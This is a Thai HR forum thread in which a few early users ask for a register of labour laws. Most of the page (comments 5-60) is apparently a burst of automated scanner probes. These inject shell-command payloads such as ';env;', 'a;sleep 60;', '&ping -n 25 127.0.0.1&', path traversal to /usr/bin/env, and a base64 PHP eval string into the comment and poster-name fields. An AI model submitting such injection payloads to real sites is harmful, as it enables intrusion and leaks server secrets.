ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:40 น.
 
ความคิดเห็นที่ 60
env
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:39 น.
 
ความคิดเห็นที่ 59
set
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:39 น.
 
ความคิดเห็นที่ 58
&set&
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:39 น.
 
ความคิดเห็นที่ 57
Hi there!
env;
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:39 น.
 
ความคิดเห็นที่ 56
Hi there!;env;
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:38 น.
 
ความคิดเห็นที่ 55
../../../../../../../../../../../../../../../usr/bin/env|
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:38 น.
 
ความคิดเห็นที่ 54
a);env;
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:38 น.
 
ความคิดเห็นที่ 53
a;env;
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:37 น.
 
ความคิดเห็นที่ 52
|env
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:37 น.
 
ความคิดเห็นที่ 51
;env;
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:37 น.
 
ความคิดเห็นที่ 50
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:36 น.
 
ความคิดเห็นที่ 49
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:36 น.
 
ความคิดเห็นที่ 48
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:36 น.
 
ความคิดเห็นที่ 47
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:36 น.
 
ความคิดเห็นที่ 46
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:35 น.
 
ความคิดเห็นที่ 45
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:35 น.
 
ความคิดเห็นที่ 44
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:34 น.
 
ความคิดเห็นที่ 43
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:34 น.
 
ความคิดเห็นที่ 42
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:33 น.
 
ความคิดเห็นที่ 41
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:33 น.
 
ความคิดเห็นที่ 40
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:33 น.
 
ความคิดเห็นที่ 39
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:33 น.
 
ความคิดเห็นที่ 38
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:32 น.
 
ความคิดเห็นที่ 37
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:32 น.
 
ความคิดเห็นที่ 36
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:32 น.
 
ความคิดเห็นที่ 35
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:31 น.
 
ความคิดเห็นที่ 34
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:31 น.
 
ความคิดเห็นที่ 33
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:31 น.
 
ความคิดเห็นที่ 32
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:31 น.
 
ความคิดเห็นที่ 31
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:30 น.
 
ความคิดเห็นที่ 30
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:30 น.
 
ความคิดเห็นที่ 29
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:30 น.
 
ความคิดเห็นที่ 28
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:29 น.
 
ความคิดเห็นที่ 27
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:29 น.
 
ความคิดเห็นที่ 26
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:28 น.
 
ความคิดเห็นที่ 25
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:28 น.
 
ความคิดเห็นที่ 24
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:27 น.
 
ความคิดเห็นที่ 23
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:27 น.
 
ความคิดเห็นที่ 22
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:14:27 น.
 
ความคิดเห็นที่ 21
Hi there!
 
ผู้ตั้ง : &ping -n 25 127.0.0.1& วันที่ : 09 ส.ค. 64 06:14:27 น.
 
ความคิดเห็นที่ 20
Hi there!
 
ผู้ตั้ง : a|sleep 60; วันที่ : 09 ส.ค. 64 06:14:26 น.
 
ความคิดเห็นที่ 19
Hi there!
 
ผู้ตั้ง : a;sleep 60; วันที่ : 09 ส.ค. 64 06:14:26 น.
 
ความคิดเห็นที่ 18
Hi there!
 
ผู้ตั้ง : a`sleep 60` วันที่ : 09 ส.ค. 64 06:14:26 น.
 
ความคิดเห็นที่ 17
Hi there!
 
ผู้ตั้ง : a`)` วันที่ : 09 ส.ค. 64 06:14:25 น.
 
ความคิดเห็นที่ 16
Hi there!
 
ผู้ตั้ง : data:;base64,PD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA/Pg== วันที่ : 09 ส.ค. 64 06:14:25 น.
 
ความคิดเห็นที่ 15
Hi there!
 
ผู้ตั้ง : /e วันที่ : 09 ส.ค. 64 06:14:22 น.
 
ความคิดเห็นที่ 14
Hi there!
 
ผู้ตั้ง : env วันที่ : 09 ส.ค. 64 06:14:21 น.
 
ความคิดเห็นที่ 13
Hi there!
 
ผู้ตั้ง : set วันที่ : 09 ส.ค. 64 06:14:21 น.
 
ความคิดเห็นที่ 12
Hi there!
 
ผู้ตั้ง : &set& วันที่ : 09 ส.ค. 64 06:14:21 น.
 
ความคิดเห็นที่ 11
Hi there!
 
ผู้ตั้ง : default env; วันที่ : 09 ส.ค. 64 06:14:20 น.
 
ความคิดเห็นที่ 10
Hi there!
 
ผู้ตั้ง : default;env; วันที่ : 09 ส.ค. 64 06:14:20 น.
 
ความคิดเห็นที่ 9
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../../../../../../usr/bin/env| วันที่ : 09 ส.ค. 64 06:14:20 น.
 
ความคิดเห็นที่ 8
Hi there!
 
ผู้ตั้ง : a);env; วันที่ : 09 ส.ค. 64 06:14:20 น.
 
ความคิดเห็นที่ 7
Hi there!
 
ผู้ตั้ง : a;env; วันที่ : 09 ส.ค. 64 06:14:19 น.
 
ความคิดเห็นที่ 6
Hi there!
 
ผู้ตั้ง : |env วันที่ : 09 ส.ค. 64 06:14:19 น.
 
ความคิดเห็นที่ 5
Hi there!
 
ผู้ตั้ง : ;env; วันที่ : 09 ส.ค. 64 06:14:19 น.
 
ความคิดเห็นที่ 4
รบกวนขอทะเบียนกฎหมายที่เกี่ยวกับงาน HR ทั้งหมดค่ะ
ขอบคุณล่วงหน้าค่ะ

[email protected]
 
ผู้ตั้ง : anne วันที่ : 12 ส.ค. 62 13:26:08 น.
 
ความคิดเห็นที่ 3
ต้องการทะเบียนกฎหมาย ด้านแรงงานค่ะ
[email protected]
 
ผู้ตั้ง : Keal วันที่ : 01 มิ.ย. 62 09:28:06 น.
 
ความคิดเห็นที่ 2
มีสรุปประเด็นสำคัญของกฏหมายแรงงานแต่ละฉบับไว้หรือเปล่าครับ อ่านไม่ไหวครับ
 
ผู้ตั้ง : นายปริญญา นิลพฤกษ์ วันที่ : 31 มี.ค. 54 14:39:36 น.
 
ความคิดเห็นที่ 1
หากท่านใดมีทะเบียนกฎหมายแรงงาน อยากจะช่วยแชร์ให้ท่านอื่นทราบ เป็นการแลกเปลี่ยนความรู้แก่กัน ท่านสามารถทิ้ง e-mail addrss ไว้ หรือจะส่งไฟล์ไปที่ผมก็ได้ครับ แล้วผมจะ upload ไปโพสลงที่หมวดทะเบียนกฎหมายและเอกสารอืนที่น่าสนใจ เพื่อให้ผู้ที่สนใจนำไปปรับใช้ตามความเหมาะสม อย่างไรก็ตาม ผมมีข้อเสนอแนะเพิ่มเติมว่า ถ้าบริษัทของท่านเกี่ยวข้องกับการส่งออกไปยังต่างประเทศโดยเฉพาะกลุ่มยุโรป ท่านจะต้องนำ code of conduct หรือ code of practice และข้อกำหนดของ ILO ที่เกี่ยวข้องเพิ่มลงไปในทะเบียนกฎหมายแรงงานด้วยครับ
 
ผู้ตั้ง : ปิยะชัย จันทรวงศ์ไพศาล วันที่ : 16 ก.พ. 54 21:36:05 น.